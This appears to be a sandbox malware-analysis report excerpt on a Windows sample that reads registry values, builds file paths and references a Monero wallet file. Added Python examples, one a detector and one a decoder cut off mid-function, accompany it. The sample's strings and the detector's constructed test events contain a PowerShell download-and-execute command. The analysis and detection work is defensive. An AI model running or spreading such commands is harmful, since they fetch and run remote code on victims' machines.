                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
                                      • Opcode ID: 7545d5536c246102fb4d9601b5a69f4d8d77025d455606f9a0a72b2d3edd7f91
                                      • Instruction ID: 148a5e3532ae38e1b6fc759bc0e6af3a6b761482e5d229eaa30f34cfe43b4644
                                      • Opcode Fuzzy Hash: 7545d5536c246102fb4d9601b5a69f4d8d77025d455606f9a0a72b2d3edd7f91
                                      • Instruction Fuzzy Hash: 2C01EC79E48305BBEB00DBE4DD49F6E7778AB48701F104098FA09EA391D770A9409B65
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A478C4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A478CB
                                      • RegOpenKeyExA.ADVAPI32(80000002,0130B788,00000000,00020119,00A47849), ref: 00A478EB
                                      • RegQueryValueExA.ADVAPI32(00A47849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00A4790A
                                      • RegCloseKey.ADVAPI32(00A47849), ref: 00A47914
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3225020163-1022791448
                                      • Opcode ID: 660d0849bd31b0a9ad404cc842ee15058ea5bdfe65db7cecbfbb792ced3a313f
                                      • Instruction ID: f92b80ed8a35344c1648f3c8b5bb74a65fb8dfc33eb5dff42caa4036963ac67f
                                      • Opcode Fuzzy Hash: 660d0849bd31b0a9ad404cc842ee15058ea5bdfe65db7cecbfbb792ced3a313f
                                      • Instruction Fuzzy Hash: 3301F4B9E44309BBEB00DBE4DC49FAE7778EB44701F104594FA09EA381D7706A108BB1
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A3A13C
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A3A161
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00A3A181
                                      • ReadFile.KERNEL32(000000FF,?,00000000,00A3148F,00000000), ref: 00A3A1AA
                                      • LocalFree.KERNEL32(00A3148F), ref: 00A3A1E0
                                      • CloseHandle.KERNEL32(000000FF), ref: 00A3A1EA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: 49c0c8d73720dba4beaef5b5419347d1d1580771ac4b95626546a590c6bf9c82
                                      • Instruction ID: 1debd90ce15a9f464aecea331517220109116ba7841254e0a449dc376100f3fe
                                      • Opcode Fuzzy Hash: 49c0c8d73720dba4beaef5b5419347d1d1580771ac4b95626546a590c6bf9c82
                                      • Instruction Fuzzy Hash: 9E31DAB4E00209EFDB14CFA4D885FAE77B5AB58304F108259F915AB390D774AA81CFA1
                                      APIs
                                      • lstrcat.KERNEL32(?,0131EB98), ref: 00A44A2B
                                        • Part of subcall function 00A48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A48F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A44A51
                                      • lstrcat.KERNEL32(?,?), ref: 00A44A70
                                      • lstrcat.KERNEL32(?,?), ref: 00A44A84
                                      • lstrcat.KERNEL32(?,0130A6B8), ref: 00A44A97
                                      • lstrcat.KERNEL32(?,?), ref: 00A44AAB
                                      • lstrcat.KERNEL32(?,0131D8A0), ref: 00A44ABF
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A48F20: GetFileAttributesA.KERNEL32(00000000,?,00A31B94,?,?,00A5577C,?,?,00A50E22), ref: 00A48F2F
                                        • Part of subcall function 00A447C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00A447D0
                                        • Part of subcall function 00A447C0: RtlAllocateHeap.NTDLL(00000000), ref: 00A447D7
                                        • Part of subcall function 00A447C0: wsprintfA.USER32 ref: 00A447F6
                                        • Part of subcall function 00A447C0: FindFirstFileA.KERNEL32(?,?), ref: 00A4480D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID:
                                      • API String ID: 2540262943-0
                                      • Opcode ID: 7d0eaeeeff437c7b61b9ec22d812759802eebdccc52863d738e2338a17da2f2c
                                      • Instruction ID: 266f6bd5186fa5cab386d435cfac5c950be81bae7c5973e68aff9189b494e5b5
                                      • Opcode Fuzzy Hash: 7d0eaeeeff437c7b61b9ec22d812759802eebdccc52863d738e2338a17da2f2c
                                      • Instruction Fuzzy Hash: 6D3160B6900218ABDB14FBB0DD89FDD733CAB98700F404589B60996151EE74A7C9CBA4
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00A42FD5
                                      Strings
                                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00A42F14
                                      • ')", xrefs: 00A42F03
                                      • <, xrefs: 00A42F89
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00A42F54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 3031569214-898575020
                                      • Opcode ID: 500524a6d1cfccbfe68da3dd31ce4f775b2f74826d753129084f14094c51f030
                                      • Instruction ID: 93a5a92677234a3a36da78adfbb90ea043aeeb5f00606e9385cd2b2651dce3e0
                                      • Opcode Fuzzy Hash: 500524a6d1cfccbfe68da3dd31ce4f775b2f74826d753129084f14094c51f030
                                      • Instruction Fuzzy Hash: DC411C75D406089AEB14FFA0C9A2FEDBB79BFA4340F404558E40666192EF702A4ACF51
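The record above is the download-and-execute stage: the function concatenates the fixed pieces listed under Strings (the SysWOW64 powershell.exe path, `-nop -c "iex(New-Object Net.WebClient).DownloadString('` and `')"`) around a runtime URL and hands the result to ShellExecuteEx at 00A42FD5. The 0000003C it passes is cbSize = 60, the size of a 32-bit SHELLEXECUTEINFO, and the host it launches is the 32-bit powershell.exe under \SysWOW64, both consistent with a 32-bit sample. The following is an added detection example, not code from the report or from the sample: it matches the invariant core of that cradle in process-creation command lines and captures the URL. The Sysmon-style field names (Image, CommandLine, ParentImage, ProcessId) and the sample events, including URLs under the reserved .invalid domain, are constructed assumptions.

```python
"""Detect the PowerShell download-and-execute cradle assembled by the function
ending in ShellExecuteEx at 00A42FD5.  Added example; field names follow
Sysmon's process-creation event and are an assumption about your telemetry."""
import re

# The report's Strings section shows the command line being built as
#   <powershell.exe> -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')"
# Only the URL is a runtime value, so match the invariant core and capture it.
CRADLE_RE = re.compile(
    r"""(?ix)
    \biex\b \s* \(? \s*                          # Invoke-Expression alias
    New-Object \s+ (?:System\.)? Net\.WebClient
    \s* \)? \s* \.DownloadString \( \s*
    (?P<q>['"]) (?P<url>[^'"]*) (?P=q) \s* \)    # quoted URL argument
    """
)

# Host images worth inspecting.  The sample launches the 32-bit host under
# \SysWOW64; the same suffix matches the 64-bit host under \System32.
POWERSHELL_HOST_SUFFIXES = (
    r"\windowspowershell\v1.0\powershell.exe",
    r"\windowspowershell\v1.0\powershell_ise.exe",
)


def classify(event):
    """Return a finding dict for one process-creation event, or None."""
    image = event.get("Image", "").lower()
    if not image.endswith(POWERSHELL_HOST_SUFFIXES):
        return None
    cmd = event.get("CommandLine", "")
    m = CRADLE_RE.search(cmd)
    if m is None:
        return None
    lowered = " " + cmd.lower()
    return {
        "rule": "powershell_webclient_downloadstring_iex",
        "url": m.group("url"),
        "noprofile": " -nop " in lowered or " -noprofile " in lowered,
        "wow64_host": "\\syswow64\\" in image,   # 32-bit host, as this sample uses
        "parent": event.get("ParentImage", ""),
        "pid": event.get("ProcessId"),
    }


def scan(events):
    """Run classify() over a list of events and keep the hits."""
    return [f for f in map(classify, events) if f is not None]


# Constructed events (not sandbox output).  The first mirrors what this sample
# would produce; the second is a benign script launch; the third is the same
# cradle written with different spacing, quoting and the 64-bit host.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": "C:\\Users\\user\\Desktop\\file.exe",
     "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe "
                    "-nop -c \"iex(New-Object Net.WebClient).DownloadString("
                    "'http://example.invalid/stage2.ps1')\""},
    {"ProcessId": 4188, "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass "
                    "-File C:\\Scripts\\backup.ps1"},
    {"ProcessId": 4210, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"IEX (New-Object "
                    "System.Net.WebClient).DownloadString('http://example.invalid/b.ps1')\""},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The match is deliberately anchored on the WebClient/DownloadString/iex core rather than on `-nop -c`, because the switches vary between loaders while the cradle does not; the `wow64_host` and `parent` fields are what you pivot on to tie the PowerShell child back to file.exe.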
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,0131DBE0,00000000,00020119,?), ref: 00A44344
                                      • RegQueryValueExA.ADVAPI32(?,0131ED00,00000000,00000000,00000000,000000FF), ref: 00A44368
                                      • RegCloseKey.ADVAPI32(?), ref: 00A44372
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A44397
                                      • lstrcat.KERNEL32(?,0131EE08), ref: 00A443AB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 690832082-0
                                      • Opcode ID: 47f3d1b16094e24a8ca81678872ece485fe3beac8ae665b5bce3c96df95d8823
                                      • Instruction ID: 25553fe76b64f4f327d56a3af01269ed02b6ad472dd2b8391df36438a8015ce8
                                      • Opcode Fuzzy Hash: 47f3d1b16094e24a8ca81678872ece485fe3beac8ae665b5bce3c96df95d8823
                                      • Instruction Fuzzy Hash: 294169B6D002086BDB14FBA0ED56FEE733DAB8C700F004558B71996181FA7596988BE1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                      • String ID:
                                      • API String ID: 3136044242-0
                                      • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction ID: 49ff5042f791a29a4ba82e24556f757cb624f6c7496983cf1d7a6330a49d2056
                                      • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction Fuzzy Hash: BA219272D00628AFFB229F55CD41A7F3A79EB83BB0F054116F8196B291C7304D518BA0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A47FC7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A47FCE
                                      • RegOpenKeyExA.ADVAPI32(80000002,0130BBB0,00000000,00020119,?), ref: 00A47FEE
                                      • RegQueryValueExA.ADVAPI32(?,0131D9C0,00000000,00000000,000000FF,000000FF), ref: 00A4800F
                                      • RegCloseKey.ADVAPI32(?), ref: 00A48022
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 49c4491e9146f83c3fd7d04dfd56a115c9bb5197c2d7e21f51a3ed8d9e1ae5ae
                                      • Instruction ID: a8a5732966b7d5d4bf207e5423cb039185c1e14d7f17596013bc54c11521dbf2
                                      • Opcode Fuzzy Hash: 49c4491e9146f83c3fd7d04dfd56a115c9bb5197c2d7e21f51a3ed8d9e1ae5ae
                                      • Instruction Fuzzy Hash: 8B114CB5E44305ABD700DB94ED46FAFBBB8FB84B10F104119F619EB280DB7969048BA1
                                      APIs
                                      • StrStrA.SHLWAPI(0131EBE0,00000000,00000000,?,00A39F71,00000000,0131EBE0,00000000), ref: 00A493FC
                                      • lstrcpyn.KERNEL32(00D07580,0131EBE0,0131EBE0,?,00A39F71,00000000,0131EBE0), ref: 00A49420
                                      • lstrlen.KERNEL32(00000000,?,00A39F71,00000000,0131EBE0), ref: 00A49437
                                      • wsprintfA.USER32 ref: 00A49457
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      • Opcode ID: f8d639e11538dbfeb68716c9c7a32cccb3173e32b3cba3984c3ebee29e5577ec
                                      • Instruction ID: 5d0cff3b95f94c80e25f311947115513c2b384813c309de2bd6c7ad1555591dd
                                      • Opcode Fuzzy Hash: f8d639e11538dbfeb68716c9c7a32cccb3173e32b3cba3984c3ebee29e5577ec
                                      • Instruction Fuzzy Hash: 0401A575904208FFCB04DFA8CD48EEE7BB8EB48304F108648F90D9B385D631AA54DBA0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A312B4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A312BB
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00A312D7
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00A312F5
                                      • RegCloseKey.ADVAPI32(?), ref: 00A312FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: d59e5afb2d66a00772f01128aab7494e1a046186f471caf7ec23e764a04f4726
                                      • Instruction ID: cd47f191f1496178cfaa1d8c5e6d23b56f9e980193b059d23a2e3728f04fdf8a
                                      • Opcode Fuzzy Hash: d59e5afb2d66a00772f01128aab7494e1a046186f471caf7ec23e764a04f4726
                                      • Instruction Fuzzy Hash: EF01CD79E44309BBDB04DFE4DC49FAE7778AB48701F104199FA09DB280D670AA008BA4
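Three of the records above (refs 00A44344, 00A47FEE and 00A312D7) are the same small routine: optionally take a 0x104 = 260 byte (MAX_PATH) buffer from the process heap, RegOpenKeyExA a key under HKEY_CURRENT_USER (80000001) or HKEY_LOCAL_MACHINE (80000002) with samDesired 00020119 = KEY_READ | KEY_WOW64_64KEY (a 32-bit process asking for the 64-bit view of the registry), RegQueryValueExA a single value, then RegCloseKey. The decoder below is an added example, not part of the report or of Joe Sandbox: it parses lines in the report's "APIs" format and annotates the registry, heap and ShellExecuteEx constants so a triage note can be generated from the listing. The sample lines are copied from this section; the reading of the two values printed after GetProcessHeap as the flags and size already pushed for the RtlAllocateHeap call that follows is an inference from the call sequence, labelled as such in the code.

```python
"""Parse the "APIs" lines of a Joe Sandbox function record and decode the
Win32 constants that matter for triage.  Added example; not part of the
report or of Joe Sandbox."""
import re

# "• [Part of subcall function XXXXXXXX: ]Api.MODULE(args), ref: XXXXXXXX"
# Parentheses and the ref are optional (e.g. "• wsprintfA.USER32 ref: 00A49457").
API_LINE_RE = re.compile(
    r"^\s*•?\s*"
    r"(?:Part of subcall function\s+(?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-F]{8}))?\s*$"
)

HKEY_ROOTS = {
    0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
}
KEY_READ = 0x20019   # STANDARD_RIGHTS_READ | QUERY_VALUE | ENUMERATE_SUB_KEYS | NOTIFY
REG_ACCESS_BITS = {
    0x0001: "KEY_QUERY_VALUE", 0x0002: "KEY_SET_VALUE", 0x0004: "KEY_CREATE_SUB_KEY",
    0x0008: "KEY_ENUMERATE_SUB_KEYS", 0x0010: "KEY_NOTIFY", 0x0020: "KEY_CREATE_LINK",
    0x0100: "KEY_WOW64_64KEY", 0x0200: "KEY_WOW64_32KEY", 0x20000: "READ_CONTROL",
}
SIZEOF_SHELLEXECUTEINFO32 = 60   # 0x3C: cbSize passed by a 32-bit caller
MAX_PATH = 260                   # 0x104


def decode_reg_access(mask):
    """Render a samDesired mask as SDK flag names (0x20119 -> KEY_READ | KEY_WOW64_64KEY)."""
    if mask is None:
        return "?"
    parts = []
    if (mask & KEY_READ) == KEY_READ:
        parts.append("KEY_READ")
        mask &= ~KEY_READ
    for bit, name in sorted(REG_ACCESS_BITS.items()):
        if mask & bit:
            parts.append(name)
            mask &= ~bit
    if mask:
        parts.append("0x%X" % mask)
    return " | ".join(parts) or "0"


def arg_int(text):
    """Joe prints stack slots as 8 hex digits; '?' and string arguments give None."""
    return int(text, 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", text) else None


def parse_api_line(line):
    m = API_LINE_RE.match(line)
    if m is None:
        return None
    args = m.group("args")
    return {
        "api": m.group("api"), "module": m.group("mod"),
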